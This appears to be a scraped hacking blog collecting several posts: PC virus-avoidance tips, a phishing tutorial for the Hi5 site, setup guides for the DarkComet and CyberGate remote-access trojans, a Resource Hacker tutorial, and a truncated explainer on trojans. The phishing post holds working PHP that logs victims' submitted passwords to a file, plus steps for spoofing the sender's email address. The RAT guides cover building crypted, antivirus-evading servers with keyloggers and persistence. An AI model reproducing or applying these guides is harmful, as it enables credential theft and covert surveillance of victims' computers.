Posted by
Ramesh Nagar
comments (0)
Is your computer infected with virus? Do you often get mysterious error messages? Well this is a common problem faced by almost all the computer users across the globe. There are many viruses and worms out there that could infect your computer. Some are harmless, but, they do have the capacity to do any number of nasty things, up to and including, erasing all data from your computer. However there are ways to keep viruses away from your PC. Here are the 12 tips to maintain a virus free computer.
1. Email is one of the common ways by which your computer can catch a virus. So it is always recommended to stay away from SPAM. Open only those emails that has it’s origin from a trusted source such as those which comes from your contact list. If you are using your own private email host (other than gmail, yahoo, hotmail etc.) then it is highly recommended that you use a good anti-spam software. And finally NEVER click on any links in the emails that comes from untrusted sources.
2. USB thumb/pen drives is another common way by which viruses spread rapidly. So it is always a good habit to perform a virus scan before copying any data onto your computer. NEVER double-click the pen drive to open it. Instead right-click on it and select the option “open”. This is a safe way to open a pen drive.
3. Be careful about using MS Outlook. Outlook is more susceptible to worms than other e-mail programs, unless you have efficient Anti-Virus programs running. Use Pegasus or Thunderbird (by Mozilla), or a web-based program such as Hotmail or Yahoo (In Firefox).
4. As we all know, Internet is the main source of all the malicious programs including viruses, worms, trojans etc. In fact Internet contributes to virus infection by up to 80%. So here are the tips for safe surfing habits so that you can ward off virus infection up to the maximum extent.
• Don’t click on pop-up windows that announce a sudden disaster in your city or announce that you’ve won an hourly prize. They are the ways to mislead Internet users and you should never trust them.
• You can also use a pop-up blocker to automatically block those pop-ups.
5. Most of us use search engines like Google to find what we are looking for. It is quite obvious for a malicious website to get listed in the search results. So to avoid visiting those untrusted malicious websites, you can download and install the AVG LinkScanner which is a freeware. This tool can become very handy and will help you to stay away from malicious websites.
6. Install a good antivirus software and keep it updated. Also perform full system scan periodically. It is highly recommended that you turn on the automatic update feature. This is the most essential task to protect your PC from virues. If PC security is your first option then it is recommended that you go for a shareware antivirus software over the free ones. Most of the antivirus supports the Auto-Protect feature that provides realtime security for your PC. Make sure that this feature is turned on.
7. Install a good Antispyware program, that operates against Internet malware and spyware.
8. Never open any email attachments that come from untrusted sources. If it is a picture, text or sound file (these attachments end in the extensions .txt, .jpeg, .gif, .bmp, .tif, .mp3, .htm, .html, and .avi), you are probably safe, but still do a scan before opening.
9. Do not use disks that other people gave you, even from work. The disk could be infected with a virus. Of course, you can run a virus scan on it first to check it out.
10. Set up your Windows Update to automatically download patches and upgrades. This will allow your computer to automatically download any updates to both the operating system and Internet Explorer. These updates fix security holes in both pieces of software.
11. While you download files from untrusted websites/sources such as torrents, warez etc. make sure that you run a virus scan before executing them.
12. And finally it is recommended not to visit the websites that feature illegal/unwanted stuffs such as cracks, serials, warez etc. since they contribute much in spreading of viruses and other malicious programs.
Posted by
Ramesh Nagar
comments (0)
What is phishing ?
Phishing is a technique of obtaining sensitive data such username,password,credit card details etc by an attacker by claiming to be a trusted or genuine organisation/company.
The most common type of phishing is Fake Login Pages. The basic methodology of this attack is written below
1.Suppose an attacker wants to hack gmail/yahoo/facebook/bank account of the victim. Attacker creates a fake login page of that website . This fake login page looks exactly like real/genuine login page.
2.Attacker then sends the link of that fake login page to victim through an email or any other means.The sender's email Id is usually spoofed to give an authentic look to it.
3. Victim clicks on the link, fake login page appears in his browser and he enters his credentials in that page thinking that it is genuine.
4.The credentials that are username and password go to the attacker. Hence victim's account gets hacked.
5.Victim is then redirected to any webpage as chosen by attacker. Most probably the victim is redirected
to genuine website or a page displaying an error.
I hope the idea is clear to you. This is the best method to hack anyone's gmail/yahoo/orkut/facebook/bank account.Creating a fake login page is very simple. Then it depends on attacker's smartness that how he manages to fool the victim to get his credentials entered in fake login page. Simply this attack depends on attacker's intelligence as well as victim's carelessness.
Countermeasuers :
The obvious countermeasure is that just dont blindly enter your sensitive data in a webpage that exactly looks likea genuine/real page. Carefully check the URL .But URLs can also be spoofed. The protocol must be hopefully https(secure) instead of http. If you still have doubts, you should check the digital certificate of the website.
Phishing Tutorial
Creating a fake login page and some social engineering trick's.
1.) First part:Creating the Fake Login Page.
In this part of the tutorial I'm going to tell you have to make a fake login page.
This method works for most of the pages but i have chosen Hi5 as an example.
Part 1:
First we create a PHP script that will save the passwords in a text file.
1.) Open notepad and put this code:
2.)Now save this as phish.php
Note:
This URL is where the victim is redirected after logging in to you fake page.
The best way to do this is to go to the original site(in this case hi5) and try to login without username and password.Of course then the site will tell you that the username/password incorrect.Now copy that url and paste in that part of the phish.php script.As you can see the hi5 has got "http://www.hi5.com/friend/login.do"
Now we have succesfully created the script that will save the password in a text file which will be later used to see logged victim password's.
Part 2:
Now we go to http://www.hi5.com and right click / View Source.
Now we need to find the place where LOGIN button in Hi5 page send the user after clicking on it.
To do that we search for something like:
In this case we have:
We replace that part with:
Then we copy the whole source and save this file as login.php.
Now upload these 2 files(login.php and phish.php) to a webhost that supports PHP and you ready to go.Just give your victim the link to your Login.php file and every time they login that php script will create a file titled passwords.txt in the same directory as login.php and phish.php.Just open the password.txt and you will see the passwords.
The phishing link should be something like this:
http://something.awa...e.com/login. php ---> Send this to your victim
And the txt file with the passwords like this:
http://something.awa...m/passwords.txt ---> View the passwords with this one.
Creating a fake login page and some social engineering trick's.
1.) First part:Creating the Fake Login Page.
In this part of the tutorial I'm going to tell you have to make a fake login page.
This method works for most of the pages but i have chosen Hi5 as an example.
Part 1:
First we create a PHP script that will save the passwords in a text file.
1.) Open notepad and put this code:
CODE
<?php
header ('Location: http://www.hi5.com/friend/login.do ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($ handle, "\r\n");
fclose($handle) ;
exit;
?>
header ('Location: http://www.hi5.com/friend/login.do ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($ handle, "\r\n");
fclose($handle) ;
exit;
?>
2.)Now save this as phish.php
Note:
CODE
header ('Location: http://www.hi5.com/friend/login.do ');
This URL is where the victim is redirected after logging in to you fake page.
The best way to do this is to go to the original site(in this case hi5) and try to login without username and password.Of course then the site will tell you that the username/password incorrect.Now copy that url and paste in that part of the phish.php script.As you can see the hi5 has got "http://www.hi5.com/friend/login.do"
Now we have succesfully created the script that will save the password in a text file which will be later used to see logged victim password's.
Part 2:
Now we go to http://www.hi5.com and right click / View Source.
Now we need to find the place where LOGIN button in Hi5 page send the user after clicking on it.
To do that we search for something like:
CODE
action=anything.
In this case we have:
CODE
action="/friend/login. do"
We replace that part with:
CODE
action="phish.php"
Then we copy the whole source and save this file as login.php.
Now upload these 2 files(login.php and phish.php) to a webhost that supports PHP and you ready to go.Just give your victim the link to your Login.php file and every time they login that php script will create a file titled passwords.txt in the same directory as login.php and phish.php.Just open the password.txt and you will see the passwords.
The phishing link should be something like this:
http://something.awa...e.com/login. php ---> Send this to your victim
And the txt file with the passwords like this:
http://something.awa...m/passwords.txt ---> View the passwords with this one.
1.) Second part:Deceiving the Victim.
Now in this part we are going to see how we can deceive our victims.The way i do it is like this.
1#.Go to your inbox and find a simple hi5 Friend Request.Copy it like in the picture:
2#.Go to http://deadfake.com/Send.aspx , scroll down for a little and paste the invitation like this:
3#
*Now select the "Accept Friend" line.
*Click the hyperlink button.
*Paste your phishing link there.
*Click OK button.
See the pic for more:
4#
Now fill in the fields like this :
To: victimemail@dumb.com
From: info@hi5.com
Subject: Someone has sent you a hi5 Friend Request
Then enter the security code and click send.The e-mail will look like it came from hi5 just that it will redirect the victim to your phishing link instead of hi5.com
The same can be done for facebook and many more websites of your choice.
NOTE:There is a chance that the email wont be sent sometimes.So the best it would be to send it on your own inbox just before you send it to your victim.
Well that's it for today boys and girls.I know it was a long tutorial but believe me it will worth it once you mastered .Let me know what you think.
Happy Phishing.
Now in this part we are going to see how we can deceive our victims.The way i do it is like this.
1#.Go to your inbox and find a simple hi5 Friend Request.Copy it like in the picture:
2#.Go to http://deadfake.com/Send.aspx , scroll down for a little and paste the invitation like this:
3#
*Now select the "Accept Friend" line.
*Click the hyperlink button.
*Paste your phishing link there.
*Click OK button.
See the pic for more:
4#
Now fill in the fields like this :
To: victimemail@dumb.com
From: info@hi5.com
Subject: Someone has sent you a hi5 Friend Request
Then enter the security code and click send.The e-mail will look like it came from hi5 just that it will redirect the victim to your phishing link instead of hi5.com
The same can be done for facebook and many more websites of your choice.
NOTE:There is a chance that the email wont be sent sometimes.So the best it would be to send it on your own inbox just before you send it to your victim.
Well that's it for today boys and girls.I know it was a long tutorial but believe me it will worth it once you mastered .Let me know what you think.
Happy Phishing.
Posted by
Ramesh Nagar
comments (0)
Ok in this thread I will show to the people who don't know how to setup DarkComet RAT v3.0.
I will show how setting up the client and how creating a server with the best settings for run under the most different configurations and ensure there are not compatibility issues with the systems.
Also I provide a package with some extra tools needed in the tuto:
- I coded a very simple runtime crypter to show people how DarkComet can be encrypted without problems with a decent crypter. The detection rate is low only detected by Avira and a-squared. Theorically it can run under x64 systems and of course x86 and under all systems xp/vista/seven.
- I provide a little upx gui tool i found to compress the server and make it size only 250kb without breaking it. The tool is perfect for noobs no command line
-All comes configured and obviously clean and tested
With all of that i only want to show to people how DarkComet can work like charm if its configured correctly and how its perfectly cryptable and the server can be very light.
Download DarkComet RAT v3.0 package
As you notice english is not my first language so dont be a fag and start flaming about this.
Ok after you download the package lets go
After downloading the package i provide extract it and open the folder you will see this content on the folder. Contains the same as de official bundle offered by DarkCoderSC and my crypter, the app to compress the server and the config files of DarkComet. You will notice the DarkComet RAT size is less than the original thats because i compressed it with the compressor when i was testing it.
Execute DarkComet. You will see the main of the program. As you can see the author make good joob with the gui.
The version i provide comes configured so you will ready to use it without troubles. The main part of the client is the general settings were you can configure the appearence of the program and some other accesibility options. One important option here is the password take in mind that if its wrong and its not the same you provided to the server connection attempts wil be refused. I'm sure the main reason of see lot of noobs who start threads regarding darkcomet is because they don't type the correct password and other stupid mistakes like this. Dont be another fag and pay attention to this little things.
In socket list you will see the ports are monitored by the client to establish the desired connections with the servers. As you can see i configured it as by default at port 1604 and with upnp activated. If your router supports upnp port forwarding will do automatically.
What i mean with port forwarding?
To establish connections between the client and the server the port must be open in the router if not the router will refuse all connection attempts and you will look like stupid faggot crying because dont recive any connection and darkcomet its a shit.
I will dont explain here how open the ports on you router(port forwarding) on google there are lot of guides and i don't want to lost more time with it.
To add more listening ports you can do it clicking on listen on the menu or right clicking the listview of the sockets in the socket list tab.
Click in server module and you will see the server builder
Double click to the left column settings-01 and you will show this messagebox that will ensure the settings i configured are loaded over the default settings.
The edit server mode is important to remember if you have in mind to crypt the server. RES mode is compatible with the vast majority of the crypters EOF mode is only compatible with the crypters that support EOF Data like crypters that works with Bifrost.
In password field you need to provide the same password configured in the client if you dont type the same, connections cant be established. The pass i configured with the client is DarkComet.
The mutex is used to avoid to run more than one instance of the server on the same computer to avoid issues.
Here you can configure the ip where the server will connect type your no-ip you have and the port you forwarded correctly and is open and used by the client.
Here you can configure the installation options of the server. The image shows the settings i recommend. Using the app path will ensure your server installs correctly in evrey systems also in systems with limited users privileges. Otherwise the server will fail to install itself and will run on the directory is located. So is and other very important setting to have in mind its not a good scenario run visible on the desktop because it was configured to install itself in system32 and failed because dont have the necessary privileges. The settings i recommend ensure server will be stable and you dont lost connections. Change the name of the process and the folder if you want.
The other options they aren't really important are optional you can decide to bind the file with another or shield even more the server to ensure you dont lost connections but i noticed activating the persistance option of the shield makes the server unkillable even for yourself that you dont be able to uninstall or close the server. Other options like kill some process of windows and other i dont recommend it.
Also you can type a message that will show when the server is executed it can be useful to confuse who executes it and make him believe its corrupt or something like this or evidently you can be a faggot and show to him hes hacked by the supadupa hacker.
You can decide activate the offline keylogger. If you forgot like me to activate me doesnt matter you can activate it later
Final step to get your server you only need to click to the build button and thats all.
You will be askin why we dont compress the server in this step the reason is because seems to dont work very good and dont compress the server as we will compress later that will be reduce a lot the size of the server.
Go to the UPX frontend folder and execute the upxfrontend exe. You will see that window. I think i configured correctly it but if not be sure is configured as in this image of this app will broke your server and will not work. Be sure is configured as in the image. Press start compression and you will see the server is reduced to only 250kbs. Its very small taking in mind the huge functions darkcomet has. Compare it with cybergate that have a lot less functions and the size of the server is the same.
This process cant be maked after crypting the server first the server needs to be packed and then crypted or the server will be broken.
Go to the DarkComet Crypter folder and run the client. Click when it indicated and press encrypt if you selected eof data check the eof data box if not its not needed. After pressing encrypt and if it all worked correctly you will recive this messagebox.
Thats all now you have your server compressed and crypted only 250kb and detected only by avira and a-squared.
And works like a charm
Remember to use DarkComet wisely
Posted by
Ramesh Nagar
comments (2)
This is my first TuT(Tutorial) tell me how i did and comment to tell me how it went. If you have any questions or need help setting this up send me a PM(private Message). Thanks and Good Luck!
Sites we will use
Download CyberGate Here..
&
http://www.no-ip.com/
The first thing you will need to download is Cybergate. You may use any version you would like v1.07.5, v1.05.1, or v1.04.8. They all set up the same.
To download Cybergate go to and click the tab that says CYBERGATE RAT, after you click that it should pop up a new tab.
On this tab look on the right side and click the tab that says RELEASES, here you can download the version of cybergate you wish to hack with.
After you download Cybergate extract the file, open it but don't go any further.
Next you will need to go to http://www.no-ip.com/ and go to the DOWNLOAD tab. After you click the download tab click Windows and go to the bottom of the page to download DUC 2.2.1 client
After you download DUC 2.2.1 client make an account on no-ip and verify your email. (Remember your info for your account you will need it later)
Once signed on to you verified account go to ADD A HOST, there you will make a hostname. Do not mess with any other settings, just type your hostname and select no-ip.org on the drop down list like so.
After you enter your hostname go to the bottom of the page and click CREAT HOST
Now X(exit) out of everything. We can now create our server on cybergate.
open Cybergate and go to Control Center, Start.
Next go to Control Center, DNS Console.
Here, you need to open No-ip/DUC 2.2.1 client (the download from No-ip) and sign in to it with your info from No-ip.com. after you sign in you will see a smiley face with glasses. uncheck and check the box next to the smile face until he blushes. When he blushes keep it checked and X(exit) no-ip.
Next, fill in the information like i did above then click update until it says Success : DNS Hostname Update Successful . after it says that you can X(exit) the DNS Console Box.
Now you are going to go to Start, Options, Select Listening Ports. Here you will decide which port you will use. it doesn't matter which port you use. you can use anything between 1 and 65535 i usually use 80, 82, or 999. its your choice.
When you choose which port you want to use type it in the top box and click the blue arrow pointing to the left.
After you set a port type in your Connection Password and remember it. i suggest you use the same password as you did on no-ip.
After you choose a port and make a password click Save.
Now you can start creating your server, go to Control Center, Builder, and Create Server.
First create a user, I usually just use 0 because its the easiest. After you make one highlight it with your mouse and click the blue arrow that says Forward.
The next Tab is Connection. highlight the default DNS and Port then delete it and ADD a new one but put your I Pv4 Address:then port your using. if you don't know what your I Pv4 Address is you can go back to DNS Console and auto detect it or go to your start and type cmd, once this is open type ipconfig and it should be right there. it should look something like this 10.0.0.14 but i just put random numbers in there. In the boxes to the right put your user for identification and put the same password you used for your connection.
The next tab is Instillation. Pretty much just copy what you see in this picture but remember to click both the random buttons plenty of times.
The next tab is a message box, this is optional.
The next tab is Key logger, the only thing you need checked is Active key logger and DELETE (Backspace). Those are the only two things to mess with so I'm not going to put a picture.
The next tab is anti-debug, you usually always check all them unless your running your server off anything other then a PC like a VMware Or Sandboxie.
The last tab is Create Server, all you need are Use Icon and Compress With UPX checked on this. After you have all the tabs filled out you can click Create Server and save the virus.
Now run it on your own computer and see if it works!
If it doesn't you didn't do one of my steps correctly but if you send me a PM i will help you fix these problems
Good luck and i hope i helped you out with this TuT!
Posted by
Ramesh Nagar
comments (0)
What is CyberGate:
CyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continuously getting developed by our experienced team.What it can do :
CyberGate was built to be a tool for various possible applications, ranging from assisting Users with routine maintenance tasks, to remotely monitoring your Children, captures regular user activities and maintain a backup of your typed data automatically. It can also be used as a monitoring device for detecting unauthorized access.
CyberGate achieves this though it's abundant array of features. A few of which are illustrated below :
CyberGate achieves this though it's abundant array of features. A few of which are illustrated below :
[+] Automatically map ports if your router supports uPnP;
[+] Multi-Threaded : allowing for multiple clients to be connected, along with increased reliability.
[+] Reverse Connection : Some of the listed advantages of a reverse connection -
# Outgoing connections generally are less treating, and are less likely to be detected or blocked by a firewall, such as a router.
# Since the remote's computer is connecting to the remote administrator, one does not need to know the remote's IP address in order to connect.
# Outgoing connections generally are less treating, and are less likely to be detected or blocked by a firewall, such as a router.
# Since the remote's computer is connecting to the remote administrator, one does not need to know the remote's IP address in order to connect.
# It is much easier to keep track of the computers the RAT is installed on, since they are all "calling home" by connecting to the remote administrator.
[+] User Friendly GUI : The neat and simple GUI of CyberGate make this tool very easy to use and the simplest way to achieve yours goals.
[+] Stealth : The various features of the server installation makes the server extremely customizable accord to each user's needs and requirements.
[+] Keylogger : This tool can be used to find out what is happening on your computer while you are away, maintain a backup of your typed data.
[+] Password recovery : It can be used to recover some of passwords that your forgot long time ago.
[+] Tasks: CyberGate is able to create either tasks for the Client to perform on a specific time after being started or an individual remote whenever it connects back to CyberGate.
[+] Connections tab: You can monitor all the connections and client performance from a connection log that will register actions and time /date for those actions.
[+] File Manager with the ability to download, run, run as administrator, and so many other and the amazing option to see all images of a selected folder as thumbnails;
[+] It can also be used as a monitoring device for detecting unauthorized access.
... and so many other options and features!
How to get CyberGate:
CyberGate comes in two variants, a trial version and a private version distributed to customers only.
Currently with only 1 edition for sale and 3 more editions getting ready for sale in the next few weeks.
Editions:
[+] CyberGate Personal Edition (available)[+] CyberGate Lite Edition (not available)
[+] CyberGate Professional Edition (not available)
[+] CyberGate Premium Edition (not available)
Download....
Posted by
Ramesh Nagar
comments (0)
Before:
After:
1. Open "%windir%\Explorer.exe" file in Resource Hacker.
2. Go to:
"String Table -> 37 -> 1033 -> 578" (If you are using Luna theme)
"String Table -> 38 -> 1033 -> 595" (If you are using Windows Classic theme)
3. You'll get a string "start". Just change it with whatever text you want to show. Make sure you put quotes.
4. Compile the script and save the file. That's it. You have done.
NOTE: To know more about Resource Hacker, Read Following...
This tutorial will help you in understanding this tool and will teach you how to use it. For your convenience, we have divided this tutorial in 2 parts:
When you open a file in Resource Hacker, it shows various directories in left-side pane, like:
[Viewing Resources]
You can view resource present in the file by expanding the directory given in left-side pane and clicking on the name of the resource. Each resource contains 3 important attributes:
For Icons / Cursors / Bitmaps:
1. First select the resource ( e.g. Bitmap -> 131 -> 1033 ).
2. Now click on Action -> Replace Icon or Cursor or Bitmap....
3. It'll open a new window, click on Open file with new Icon or Cursor or Bitmap button.
4. Select the desired resource using OPEN dialog box, click on Open button and then click on Replace button.
For Other Resources like AVI:
1. Click on Action -> Replace Other Resource....
2. It'll open a new window, click on Open file with new resource button.
3. Select the file and click on Open button.
4. Now you'll need to provide following required information for the resource, which we mentioned earlier:
Resource Type: Mention type of the resource, e.g. if you are replacing AVI file, mention the type as AVI
Resource Name: Provide the same name of the existing resource which you want to replace
Resource Language: Provide language code for the resource, e.g. 1033 for English. You can check existing resource's language code.
5. At last click on Replace button.
[For Menus / Strings / Dialogs]
To change any String, Menu or Dialog box, Select the desired resource, e.g. String Table -> 4 -> 1033, make your changes and at last click on Compile Script button.
It'll immediately compile the script. If you made any mistake while modifying the resource, it'll generate error message so that you can fix it.
Adding New Bitmaps / Icons / Cursors / AVIs:
1. Click on Action -> Add a new Resource....
2. Now click on Open file with new resource button.
3. Select the desired resource and click on Open button.
4. Give Resource Type, Name and Language as mentioned earlier. But keep in mind that Resource Name should not match with any existing resources name.
5. At last click on Add Resource button.
Adding New Menus:
Go to desired menu, e.g. Menu -> 215 -> 1033. Now add a new line anywhere inside POPUP "" using following format:
[Inserting Newly Added Resources in Dialog Boxes]
Once you finish adding new Icons / Bitmaps / AVIs, you can insert them in any dialog box so that you can show in various Windows dialog boxes like RUN, Progress Dialog box, etc.
1. Go to the desired dialog box, e.g. Dialog -> 1020 -> 1033
2. Right-click in the dialog box and select Insert Control option.
3. It'll open a new window. You'll see many controls in the new window, like BITMAP, LABEL, ICON, BUTTON, SysAnimate32 (for AVIs), etc.
4. Click on any desired control, e.g. to insert a Bitmap, click on the BITMAP control or to insert an AVI, click on SysAnimate32 control.
PS: You can also insert Date/Time in dialog box using SysDateTimePick32 control.
5. Don't forget to fill the Caption entry. You need to enter the Resource Name in Caption textbox, e.g. if you have added a Bitmap and set its Resource Name as 401, then give the same 401 in Caption textbox.
PS: For AVI Control ( SysAnimate32 ), you'll need to append # in Caption value, e.g if the AVI name is 144, then put #144 in Caption textbox.
6. At last click on OK button & then Compile the script.
7. If you want to change the position of the new control in dialog box, simply click on the control and drag it to your desired location or you can also use arrow keys to move it.
You can use scripts in 2 ways:
You can use following commands in Command Prompt to perform actions using Resource Hacker:
You can also run a series of commands using script. First you'll need to create the script file using Notepad and then you can run it using following command:
Following is the required format of the script file:
EXE= contains source file name
SaveAs= contains output file name
Log= contains LOG file name which will store a detailed log of the operation
[COMMANDS] section contains the command-set which we want to perform on the source file.
PS: You can omit the LOG= entry in script file. In this case, Resource Hacker will automatically create a LOG file with the name "ResHacker.log".
After:
1. Open "%windir%\Explorer.exe" file in Resource Hacker.
2. Go to:
"String Table -> 37 -> 1033 -> 578" (If you are using Luna theme)
"String Table -> 38 -> 1033 -> 595" (If you are using Windows Classic theme)
3. You'll get a string "start". Just change it with whatever text you want to show. Make sure you put quotes.
4. Compile the script and save the file. That's it. You have done.
NOTE: To know more about Resource Hacker, Read Following...
This tutorial will help you in understanding this tool and will teach you how to use it. For your convenience, we have divided this tutorial in 2 parts:
- PART 1: BASIC INFORMATION
- PART 2: ADVANCED INFORMATION
[Using Resource Hacker]PART1 : BASIC INFORMATION
When you open a file in Resource Hacker, it shows various directories in left-side pane, like:
- AVI - Contains AVI files
- Cursor - Contains Cursor files
- Bitmap - Contains BMP files
- Icon - Contains Icons
- Menu - Contains Menus
- Dialog - Contains Dialog boxes
- String Table - Contains Strings
- Accelerators - Contains Shortcut keys
- Version Info - Contains Version information of the file
[Viewing Resources]
You can view resource present in the file by expanding the directory given in left-side pane and clicking on the name of the resource. Each resource contains 3 important attributes:
- Resource Type
- Resource Name
- Resource Language
For Icons / Cursors / Bitmaps:
1. First select the resource ( e.g. Bitmap -> 131 -> 1033 ).
2. Now click on Action -> Replace Icon or Cursor or Bitmap....
3. It'll open a new window, click on Open file with new Icon or Cursor or Bitmap button.
4. Select the desired resource using OPEN dialog box, click on Open button and then click on Replace button.
For Other Resources like AVI:
1. Click on Action -> Replace Other Resource....
2. It'll open a new window, click on Open file with new resource button.
3. Select the file and click on Open button.
4. Now you'll need to provide following required information for the resource, which we mentioned earlier:
- Resource Type
- Resource Name
- Resource Language
Resource Type: Mention type of the resource, e.g. if you are replacing AVI file, mention the type as AVI
Resource Name: Provide the same name of the existing resource which you want to replace
Resource Language: Provide language code for the resource, e.g. 1033 for English. You can check existing resource's language code.
5. At last click on Replace button.
[For Menus / Strings / Dialogs]
To change any String, Menu or Dialog box, Select the desired resource, e.g. String Table -> 4 -> 1033, make your changes and at last click on Compile Script button.
It'll immediately compile the script. If you made any mistake while modifying the resource, it'll generate error message so that you can fix it.
[Adding New Resources]PART2 : ADVANCED INFORMATION
Adding New Bitmaps / Icons / Cursors / AVIs:
1. Click on Action -> Add a new Resource....
2. Now click on Open file with new resource button.
3. Select the desired resource and click on Open button.
4. Give Resource Type, Name and Language as mentioned earlier. But keep in mind that Resource Name should not match with any existing resources name.
5. At last click on Add Resource button.
Adding New Menus:
Go to desired menu, e.g. Menu -> 215 -> 1033. Now add a new line anywhere inside POPUP "" using following format:
MENUITEM "Custom_String", 12345, MFT_STRING, MFS_GRAYED | MFS_DEFAULTWhere:
- "Custom_String" is the actual text which you want to show in menu.
- 12345 is the identifier. It must be different from existing menuitems.
- MFS_GRAYED disables the menuitem. You can change it to MFS_ENABLED if you want to show your menuitem enabled.
- MFS_DEFAULT shows your menuitem in BOLD. You can omit it.
- You can also add a new attribute in the code MFS_HILITE which automatically selects your menuitem.
MENUITEM "Custom_String", 12345And Resource Hacker will automatically insert other remaining values as mentioned above.
[Inserting Newly Added Resources in Dialog Boxes]
Once you finish adding new Icons / Bitmaps / AVIs, you can insert them in any dialog box so that you can show in various Windows dialog boxes like RUN, Progress Dialog box, etc.
1. Go to the desired dialog box, e.g. Dialog -> 1020 -> 1033
2. Right-click in the dialog box and select Insert Control option.
3. It'll open a new window. You'll see many controls in the new window, like BITMAP, LABEL, ICON, BUTTON, SysAnimate32 (for AVIs), etc.
4. Click on any desired control, e.g. to insert a Bitmap, click on the BITMAP control or to insert an AVI, click on SysAnimate32 control.
PS: You can also insert Date/Time in dialog box using SysDateTimePick32 control.
5. Don't forget to fill the Caption entry. You need to enter the Resource Name in Caption textbox, e.g. if you have added a Bitmap and set its Resource Name as 401, then give the same 401 in Caption textbox.
PS: For AVI Control ( SysAnimate32 ), you'll need to append # in Caption value, e.g if the AVI name is 144, then put #144 in Caption textbox.
6. At last click on OK button & then Compile the script.
7. If you want to change the position of the new control in dialog box, simply click on the control and drag it to your desired location or you can also use arrow keys to move it.
We can also run Resource Hacker using Command Prompt and can use scripts to automate lots of repeatative tasks to save our time.Using Scripts in Resource Hacker
You can use scripts in 2 ways:
- Single Command
- Multiple Commands
You can use following commands in Command Prompt to perform actions using Resource Hacker:
-add ExeFileName, ResultingFileName, ResourceAddress, ResourceType, ResourceName,Where:
-addskip ExeFileName, ResultingFileName, ResourceAddress, ResourceType, ResourceName,
-addoverwrite ExeFileName, ResultingFileName, ResourceAddress, ResourceType, ResourceName,
-modify ExeFileName, ResultingFileName, ResourceAddress, ResourceType, ResourceName,
-extract ExeFileName, ResourceAddress, ResourceType, ResourceName,
-delete ExeFileName, ResultingFileName, ResourceType, ResourceName,
- ExeFileName - Source file name
- ResultingFileName - Output file name
- ResourceAddress - Resource location (e.g. Bitmap path stored in your hard disk)
- ResourceType - Resource type (e.g. Bitmap, AVI, etc.)
- ResourceName - Resource name (e.g. 131, 1020, etc.)
ResHacker.exe -addoverwrite explorer.exe, explorer1.exe, MyImage.bmp , bitmap, 143,[Multiple Commands]
You can also run a series of commands using script. First you'll need to create the script file using Notepad and then you can run it using following command:
ResHacker.exe -script ScriptFileNameWhere, ScriptFileName is the name of the script file which you created in Notepad.
Following is the required format of the script file:
[FILENAMES]Where:
Exe=
SaveAs=
Log=
[COMMANDS]
-addoverwrite ResourceAddress, ResourceType, ResourceName
EXE= contains source file name
SaveAs= contains output file name
Log= contains LOG file name which will store a detailed log of the operation
[COMMANDS] section contains the command-set which we want to perform on the source file.
PS: You can omit the LOG= entry in script file. In this case, Resource Hacker will automatically create a LOG file with the name "ResHacker.log".
Posted by
Ramesh Nagar
comments (0)
Trojans and Backdoors
A Trojan horse is:
o An unauthorized program contained within a legitimate program. This unauthorized program performs functions unknown (and probably unwanted) by the user.
o A legitimate program that has been altered by the placement of unauthorized code within it; this code performs functions unknown (and probably unwanted) by the user.
o Any program that appears to perform a desirable and necessary function but that (because of unauthorized code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user.
Trojan horses can do anything that the user who executes the program on the remote machine can. This includes deleting files, transmitting to the intruder any files that can be read, changing any files that can be modified, installing other programs such as programs that provide unauthorized network access that the user is entitled to and executing privilege-elevation attacks; that is, the Trojan horse can attempt to exploit a vulnerability to increase the level of access beyond that of the user running the Trojan horse. If this is successful, the Trojan horse can operate with the increased privileges and go about installing other malicious code.
If the user has administrative access to the operating system, the Trojan horse can do anything that an administrator can.
A compromise of any system on a network may have consequences for the other systems on the network. Particularly vulnerable are systems that transmit authentication material, such as passwords, over shared networks in clear text or in a trivially encrypted form, which is very common.
If a system on such a network is compromised via a Trojan (or another method), the intruder may be able to record usernames and passwords or other sensitive information as it navigates the network.
Additionally, a Trojan, depending on the actions it performs, may falsely implicate the remote system as the source of an attack by spoofing and thereby cause the remote system to incur liability.
Trojans and Backdoors - : Working of Trojans
Ø Attacker gets access to the trojaned system as the system goes online
Ø By way of the access provided by the trojan attacker can stage attacks of different types.
Trojans work similar to the client-server model. Trojans come in two parts, a Client part and a Server part. The attacker deploys the Client to connect to the Server, which runs on the remote machine when the remote user (unknowingly) executes the Trojan on the machine. The typical protocol used by most Trojans is the TCP/IP protocol, but some functions of the Trojans may make use of the UDP protocol as well.
When the Server is activated on the remote computer, it will usually try to remain in a stealth mode, or hidden on the computer. This is configurable - for example in the Back Orifice Trojan, the server can be configured to remain in stealth mode and hide its process. Once activated, the server starts listening on default or configured ports for incoming connections from the attacker. It is usual for Trojans to also modify the registry and/or use some other auto starting method.
To exploit a Trojan, attackers need to ascertain the remote IP address to connect to the machine. Many Trojans have configurable features like mailing the victim's IP, as well as messaging the attacker via ICQ or IRC. This is relevant when the remote machine is on a network with dynamically assigned IP address or when the remote machine uses a dial-up connection to connect to the Internet. DSL users on the other hand, have static IPs so the infected IP is always known to the attacker.
Most of the Trojans use auto-starting methods so that the servers are restarted every time the remote machine reboots / starts. This is also notified to the attacker. As these features are being countered, new auto-starting methods are evolving. The start up method ranges from associating the Trojan with some common executable files such as explorer.exe to the known methods like modifying the system files or the Windows Registry. Some of the popular system files targeted by Trojans are Autostart Folder, Win.ini, System.ini, Wininit.ini, Winstart.bat, Autoexec.bat Config.sys. Could also be used as an auto-starting method for Trojans.
Trojans and Backdoors - :Various Trojan
Ø Remote Access Trojans
Ø Password Sending Trojans
Ø Keyloggers
Ø Destructive
Ø Denial Of Service (DoS) Attack Trojans
Ø Proxy/Wingate Trojans
Ø FTP Trojans
Ø Software Detection Killers
■ Remote Access Trojans
These are the Trojans usually seen referred to in the media and hence gain high visibility because of their ability to give the attackers the power to do more things on the victim's machine than the victim itself, while standing in front of the machine. Most of these Trojans are often a combination of the other variations discussed below.
■ Password Sending Trojans
